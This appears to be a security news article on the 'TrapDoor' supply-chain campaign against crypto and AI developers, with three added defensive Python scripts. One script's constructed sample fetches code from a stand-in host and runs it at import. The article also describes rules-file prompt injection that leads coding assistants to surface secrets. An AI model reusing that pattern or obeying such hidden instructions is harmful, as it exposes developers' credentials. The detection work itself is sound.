Malware: New ‘TrapDoor’ Supply Chain Attack Reportedly Targets Blockchain and Crypto Devs Across Multiple Ecosystems

Cybersecurity researchers have uncovered a supply chain campaign, tracked as TrapDoor, that publishes malicious packages to popular package registries in order to compromise developers working on cryptocurrency, decentralized finance (DeFi), artificial intelligence and blockchain projects. First spotted on May 22, 2026, the operation spread quickly across npm, PyPI and Crates.io, spanning dozens of packages and hundreds of published versions.

Security firm Socket identified at least 34 malicious packages and at least 384 related versions. The attackers released them in coordinated waves from a small number of publisher accounts.

These packages masquerade as legitimate development utilities, such as project scaffolding tools, model-routing helpers, prompt-engineering libraries, Solidity assistants, and build utilities for Sui and Move development.

The disguise targets developers in high-value ecosystems such as Solana, Sui and Aptos, who routinely install tools of this kind as part of everyday workflows.

The malware uses ecosystem-specific execution techniques. On npm, many of the packages use install-lifecycle hooks (post-install scripts) to launch a comprehensive JavaScript payload, trap-core.js, as soon as the package is installed; the victim never has to import the package.

That component scans the local system for sensitive information, checks stolen AWS and GitHub credentials against the respective services to confirm they are valid, and establishes persistence through cron jobs, systemd services, Git hooks and custom configuration files.

It also attempts lateral movement, using harvested SSH keys to reach additional hosts.

The PyPI packages execute remote JavaScript payloads on import, downloading the code from attacker-controlled infrastructure.

Because the payload is fetched at runtime, the attackers can change it without publishing a new package version, and a static review of the files on PyPI will not show what actually runs on the developer's machine.
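Import-time execution is the property a reviewer can check for before installing a PyPI package. The following scanner is an added example, not code from the Socket report or from the campaign; it parses a module with Python's ast, resolves import aliases so that `import subprocess as sp` cannot hide a call, and reports watch-listed network and process-execution calls that run at import time: module-level statements, class bodies, and the bodies of module-level functions that module-level code invokes. The watch-list and the sample package source (which points at a non-resolvable example.invalid host) are constructed for this example.

```python
import ast

# Calls worth a second look when they execute at import time.
# Constructed watch-list for this example; extend it for your environment.
WATCH = {
    "subprocess.run", "subprocess.Popen", "subprocess.call", "subprocess.check_output",
    "os.system", "os.popen", "exec", "eval",
    "urllib.request.urlopen", "urllib.request.urlretrieve",
    "requests.get", "requests.post", "socket.create_connection",
    "http.client.HTTPConnection", "http.client.HTTPSConnection",
}


def _dotted(node):
    """Turn a Name/Attribute chain such as sp.run into 'sp.run'; None otherwise."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def import_time_calls(source):
    """Return (lineno, resolved_call, context) for watch-listed calls that run when
    the module is imported: module-level code, class bodies, and the bodies of
    module-level functions that module-level code calls."""
    tree = ast.parse(source)

    # Map local names to fully qualified ones so aliases cannot hide a call.
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name          # import x.y as z  -> z: x.y
                else:
                    top = a.name.split(".")[0]
                    aliases[top] = top                   # import x.y      -> x: x
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"

    def resolve(name):
        if name is None:
            return None
        head, _, rest = name.partition(".")
        return aliases.get(head, head) + (f".{rest}" if rest else "")

    funcs = {n.name: n for n in tree.body if isinstance(n, ast.FunctionDef)}
    findings = []

    class Scan(ast.NodeVisitor):
        def __init__(self, context, seen):
            self.context, self.seen = context, seen

        def visit_FunctionDef(self, node):      # defined, not executed, at import time
            return
        visit_AsyncFunctionDef = visit_Lambda = visit_FunctionDef

        def visit_Call(self, node):
            name = resolve(_dotted(node.func))
            if name in WATCH:
                findings.append((node.lineno, name, self.context))
            elif name in funcs and name not in self.seen:
                # A module-level function invoked at import time: its body runs too.
                inner = Scan(f"{self.context}->{name}()", self.seen | {name})
                for stmt in funcs[name].body:
                    inner.visit(stmt)
            self.generic_visit(node)

    Scan("<module>", frozenset()).visit(tree)
    return findings


# Constructed sample of a "prompt helper" module; not a real package.
SAMPLE_PACKAGE = '''
"""Prompt helper: a constructed sample, not a real package."""
import os
import subprocess as sp
from urllib.request import urlopen

def build_prompt(text):
    return text.strip()          # only runs when a caller invokes it

def _setup():
    code = urlopen("https://example.invalid/bootstrap.js").read()
    sp.run(["node", "-e", code])

_setup()                         # invoked at import: its body is effectively module code
os.system("echo setup complete")
'''


def demo():
    """Scan the constructed sample; returns the three import-time findings."""
    return import_time_calls(SAMPLE_PACKAGE)


if __name__ == "__main__":
    for lineno, call, context in demo():
        print(f"line {lineno}: {call} runs at import ({context})")
```

Run it against the unpacked sdist or wheel of a package (the `__init__.py` and anything it imports) before installing. A hit is not proof of malice, since some legitimate packages do shell out at import, but a library that fetches a URL and hands the result to `node` or `exec` at import time is exactly the pattern the PyPI packages in this campaign rely on.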

The Rust crates on Crates.io rely on malicious build.rs build scripts, which Cargo compiles and executes when the crate is built, so adding the crate as a dependency and running a build is enough to trigger them.

These scripts specifically hunt for local keystores associated with Sui and Move development, encrypting the harvested data with a hardcoded key before exfiltrating it.

Targeted data includes SSH keys, cryptocurrency wallet data (particularly for Solana, Sui, Aptos, Coinbase, Binance and MetaMask), browser profiles, AWS credentials, GitHub tokens, API keys and environment variables.

Theft on this scale enables not only direct wallet drains but also broader network compromise, repository access and CI/CD pipeline breaches.

A notable twist in TrapDoor involves AI development tools.

The malware plants hidden instructions in files such as .cursorrules and CLAUDE.md, which coding assistants such as Cursor and Claude Code read as project instructions, hiding the text with zero-width Unicode characters so that it is invisible in an editor but still consumed by the model.

These injected prompts aim to trick the AI assistant into performing disguised “security scans” that surface additional secrets.
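Hidden instructions of this kind are easy to miss in a code review but easy to find mechanically. The following checker is an added example, not code from the report or the campaign: it flags every character in Unicode's "format" (Cf) category, which covers zero-width spaces and joiners, the byte-order mark, bidirectional overrides and the tag block, plus a few invisible non-Cf code points; it also goes one step beyond the zero-width characters the report mentions by decoding text smuggled as Unicode tag characters (U+E0020..U+E007E, an invisible mirror of printable ASCII) back into readable form. The sample CLAUDE.md-style content and the extra code point list are constructed for this example.

```python
import unicodedata

# Invisible code points outside the Cf category that editors still render as
# nothing. Constructed list for this example; extend as needed.
EXTRA_HIDDEN = {"\u115f", "\u1160", "\u3164", "\uffa0", "\u2800"}
TAG_LO, TAG_HI = 0xE0020, 0xE007E   # Unicode tag characters mirroring ASCII 0x20..0x7E


def is_hidden(ch):
    """True for zero-width, bidi-control, tag and similar invisible characters."""
    return ch in EXTRA_HIDDEN or unicodedata.category(ch) == "Cf"


def find_hidden(text):
    """Locate hidden characters; returns dicts with 1-based line/column positions."""
    hits = []
    for lineno, line in enumerate(text.split("\n"), start=1):
        for col, ch in enumerate(line, start=1):
            if is_hidden(ch):
                hits.append({"line": lineno, "col": col,
                             "codepoint": f"U+{ord(ch):04X}",
                             "name": unicodedata.name(ch, "<unnamed>")})
    return hits


def decode_tag_runs(text):
    """Recover ASCII text smuggled as runs of Unicode tag characters."""
    runs, current = [], []
    for ch in text:
        cp = ord(ch)
        if TAG_LO <= cp <= TAG_HI:
            current.append(chr(cp - 0xE0000))
        elif current:
            runs.append("".join(current))
            current = []
    if current:
        runs.append("".join(current))
    return runs


def strip_hidden(text):
    """Return the text with every hidden character removed; newlines and tabs stay."""
    return "".join(ch for ch in text if not is_hidden(ch))


def _tag_encode(s):
    """Encode printable ASCII as invisible tag characters (only used to build the sample)."""
    return "".join(chr(0xE0000 + ord(c)) for c in s)


# Constructed rules-file content with two hidden payloads; not a real file.
SAMPLE_RULES = (
    "# Project rules\n"
    "Run the test suite before committing.\n"
    "Keep functions small.\u200b\u200b\u200c\n"         # zero-width characters after visible text
    "Thanks!" + _tag_encode("hidden text") + "\n"      # tag-encoded ASCII after visible text
)


if __name__ == "__main__":
    for hit in find_hidden(SAMPLE_RULES):
        print(f"line {hit['line']} col {hit['col']}: {hit['codepoint']} {hit['name']}")
    print("smuggled text:", decode_tag_runs(SAMPLE_RULES))
```

Run `find_hidden` over every `.cursorrules`, `CLAUDE.md`, `.github/copilot-instructions.md` or similar file in a repository, and over pull requests that touch them; a single leading U+FEFF byte-order mark is usually benign, anything else deserves a look at the decoded or stripped content. Stripping is only a cleanup step: a file that carried hidden instructions should be treated as evidence that the machine or repository was tampered with.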

The attackers have also submitted pull requests to popular AI and developer projects (including LangChain) in an attempt to propagate these configuration files.

The campaign shows how developer-targeted threats are evolving, blending traditional typosquatting with advanced persistence and manipulation of AI coding assistants.

Infrastructure links, including a GitHub account hosting payloads and documentation, tie the efforts together across platforms.

Developers are urged to audit dependency lockfiles, review anything installed recently, rotate any credential that may have been exposed (doing so from a clean machine, since the malware persists on and monitors compromised ones), and use security tooling that scans dependencies for supply chain risks. As blockchain and AI development accelerate, incidents like this underline the need to verify open-source dependencies rather than trust them by name.
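The lockfile audit recommended above, and the install-hook technique described earlier for the npm packages, come together in one check: in a package-lock.json (lockfileVersion 2 or 3), npm records `"hasInstallScript": true` for every package that carries a preinstall, install or postinstall script, so a diff between a known-good lockfile and the current one can pinpoint new or changed dependencies that will run code at install time. The following script is an added example, not code from the Socket report or the campaign; the two lockfiles, their package names (move-build-helper, prompt-router-kit), integrity strings and the example.invalid host are constructed for this example and are not the real TrapDoor package names.

```python
import json
from urllib.parse import urlparse

# Registries that dependencies are expected to resolve from (constructed allow-list).
ALLOWED_HOSTS = {"registry.npmjs.org"}


def load_lock(path):
    """Read a package-lock.json (lockfileVersion 2 or 3) from disk."""
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def audit_lock(baseline, current):
    """Compare two lockfiles and return what a reviewer should look at first."""
    old = {p: e for p, e in baseline.get("packages", {}).items() if p}  # "" is the root project
    new = {p: e for p, e in current.get("packages", {}).items() if p}

    added = sorted(p for p in new if p not in old)
    changed = sorted(p for p in new if p in old and
                     (new[p].get("version"), new[p].get("integrity"))
                     != (old[p].get("version"), old[p].get("integrity")))
    install_scripts = sorted(p for p, e in new.items() if e.get("hasInstallScript"))
    off_registry = sorted(p for p, e in new.items()
                          if e.get("resolved")
                          and urlparse(e["resolved"]).hostname not in ALLOWED_HOSTS)
    no_integrity = sorted(p for p, e in new.items() if not e.get("integrity"))
    return {
        "added": added,
        "changed": changed,
        "install_scripts": install_scripts,
        # Highest priority: something new or changed that also runs code on install.
        "new_with_install_script": sorted(set(added + changed) & set(install_scripts)),
        "off_registry": off_registry,
        "no_integrity": no_integrity,
    }


def _entry(name, version, integrity=None, host="registry.npmjs.org", install_script=False):
    """Build a lockfile entry for the constructed samples below."""
    e = {"version": version, "resolved": f"https://{host}/{name}/-/{name}-{version}.tgz"}
    if integrity:
        e["integrity"] = integrity
    if install_script:
        e["hasInstallScript"] = True
    return e


# Constructed lockfiles with hypothetical package names and fake integrity values.
BASELINE_LOCK = {"lockfileVersion": 3, "packages": {
    "": {"name": "my-app", "version": "1.0.0"},
    "node_modules/express": _entry("express", "4.18.2", "sha512-AAA"),
    "node_modules/esbuild": _entry("esbuild", "0.19.0", "sha512-BBB", install_script=True),
    "node_modules/lodash": _entry("lodash", "4.17.20", "sha512-CCC"),
}}
CURRENT_LOCK = {"lockfileVersion": 3, "packages": {
    "": {"name": "my-app", "version": "1.0.0"},
    "node_modules/express": _entry("express", "4.18.2", "sha512-AAA"),
    "node_modules/esbuild": _entry("esbuild", "0.19.0", "sha512-BBB", install_script=True),
    "node_modules/lodash": _entry("lodash", "4.17.21", "sha512-DDD"),          # version bump
    "node_modules/move-build-helper": _entry("move-build-helper", "1.0.3", "sha512-EEE",
                                             install_script=True),             # new + runs on install
    "node_modules/prompt-router-kit": _entry("prompt-router-kit", "0.2.0",
                                             host="example.invalid"),          # new, off-registry, no integrity
}}


def demo():
    """Audit the constructed current lockfile against the constructed baseline."""
    return audit_lock(BASELINE_LOCK, CURRENT_LOCK)


if __name__ == "__main__":
    for key, paths in demo().items():
        print(f"{key}: {paths}")
```

In practice the baseline is the lockfile from the last reviewed commit (`git show <ref>:package-lock.json`) and the current one is the working tree. Local `"link": true` workspace entries carry no integrity field and will appear under `no_integrity`; that is expected. When reinstalling on a clean machine, `npm ci --ignore-scripts` prevents every lifecycle script from running, which closes the post-install vector at the cost of breaking packages that genuinely need a build step, so run those few explicitly after reviewing them.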
